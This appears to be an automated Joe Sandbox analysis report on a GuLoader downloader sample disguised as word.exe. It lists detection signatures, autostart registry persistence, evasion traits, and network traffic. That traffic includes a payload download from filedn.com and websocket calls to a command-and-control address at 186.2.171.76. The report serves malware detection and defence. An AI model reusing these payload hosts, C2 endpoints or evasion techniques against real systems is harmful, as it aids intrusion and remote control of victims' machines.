Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
word.exe

Overview

General Information

Sample name:word.exe
Analysis ID:1497467
MD5:0ea4553778672b58bbd711fb039552c8
SHA1:8487f359428f19444696ce610ed81c6b4dd56a6a
SHA256:910ae266eb8177aa46e2a2c77029e57b30d7aaa819c3b8451514bf1b1ae26f8d
Infos:

Detection

GuLoader
Score:54
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected GuLoader
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • word.exe (PID: 9140 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)
    • word.exe (PID: 8792 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\spherosome\preadoption\preembodiment\Unending.dieJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    C:\Users\user\AppData\Local\Temp\nsh912A.tmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

              Sigma Signatures

              Sigma detected: CurrentVersion NT Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\word.exe, ProcessId: 8792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Run

              Suricata Signatures

              Timestamp:2024-08-22T16:13:35.638517+0200
              SID:2803270
              Severity:2
              Source Port:49794
              Destination Port:443
              Protocol:TCP
              Classtype:Potentially Bad Traffic

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: word.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00151B78 CryptQueryObject,21_2_00151B78
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00151B77 CryptQueryObject,21_2_00151B77
              Source: word.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: word.exeStatic PE information: certificate valid
              Source: unknownHTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2
              Source: word.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00405FF5 FindFirstFileA,FindClose,0_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004055B1
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00402645 FindFirstFileA,21_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00405FF5 FindFirstFileA,FindClose,21_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,21_2_004055B1
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015CB01h21_2_0015B43C
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015CCA9h21_2_0015B43C
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]21_2_00153265
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]21_2_0015255C
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015BB5Ch21_2_00154CE4
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015BB5Bh21_2_00154CE4
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then mov eax, dword ptr [ebp-28h]21_2_00154CE4
              Source: global trafficHTTP traffic detected: GET /agent.ashx HTTP/1.1Host: 186.2.171.76Upgrade: websocketConnection: UpgradeSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==Sec-WebSocket-Version: 13Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
              Source: Joe Sandbox ViewIP Address: 186.2.171.76 186.2.171.76
              Source: Joe Sandbox ViewJA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49794 -> 74.120.9.25:443
              Source: global trafficHTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: filedn.comCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: filedn.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /agent.ashx HTTP/1.1Host: 186.2.171.76Upgrade: websocketConnection: UpgradeSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==Sec-WebSocket-Version: 13Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
              Source: global trafficDNS traffic detected: DNS query: filedn.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundReferrer-Policy: no-referrerX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Security-Policy: default-src 'none'; script-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; img-src 'self'; style-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG';Content-Type: text/html; charset=utf-8Content-Length: 2551ETag: W/"9f7-Mp+Fx3llRl+T15vdlmej7Jb+VGo"Set-Cookie: xid=e30=; path=/; samesite=lax; secure; httponlySet-Cookie: xid.sig=BzUgfgjtGT50YZcFx1QzksALeKi6x4FkK-W1U0iWT-1Ab08e5FW08ZvU_ej4h5aG; path=/; samesite=lax; secure; httponlyVary: Accept-EncodingDate: Thu, 22 Aug 2024 14:13:46 GMTConnection: close
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certificate.crt/
              Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificate.crt/localhosthttp://localhost/7
              Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificate.crt/localhostsihttp://localhost/o
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
              Source: word.exe, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: word.exe, 00000000.00000000.860411221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, word.exe, 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmp, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0?
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0_
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://186.2.171.76/agent.ashx
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://186.2.171.76/agent.ashx$
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://186.2.171.76/agent.ashxP
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownHTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040511A
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,21_2_00403217
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004049590_2_00404959
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004062CB0_2_004062CB
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0040495921_2_00404959
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_004062CB21_2_004062CB
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015B43C21_2_0015B43C
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_001516B121_2_001516B1
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015080821_2_00150808
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015089821_2_00150898
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00154E1021_2_00154E10
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe 910AE266EB8177AA46E2A2C77029E57B30D7AAA819C3B8451514BF1B1AE26F8D
              Source: C:\Users\user\Desktop\word.exeCode function: String function: 004029FD appears 47 times
              Source: word.exe, 00000000.00000000.860475916.0000000000447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
              Source: word.exe, 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
              Source: word.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal54.troj.evad.winEXE@3/10@1/2
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040442A GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,0_2_0040442A
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,0_2_00402036
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\spherosomeJump to behavior
              Source: C:\Users\user\Desktop\word.exeMutant created: \Sessions\1\BaseNamedObjects\MeshCentralAssistantSingletonMutex
              Source: C:\Users\user\Desktop\word.exeMutant created: NULL
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\AppData\Local\Temp\nsh9129.tmpJump to behavior
              Source: word.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\word.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\word.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\word.exeFile read: C:\Users\user\Desktop\word.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
              Source: C:\Users\user\Desktop\word.exeProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
              Source: C:\Users\user\Desktop\word.exeProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"Jump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ncryptprov.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: netfxperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: esentprf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfts.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: utildll.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: tdh.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msdtcuiu.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: atl.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msdtcprx.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mtxclu.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: clusapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: resutils.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msscntrs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfdisk.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wmiclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfnet.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: browcli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfos.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfproc.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: sysmain.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasctrs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: tapiperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfctrs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: usbperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: tquery.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\word.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
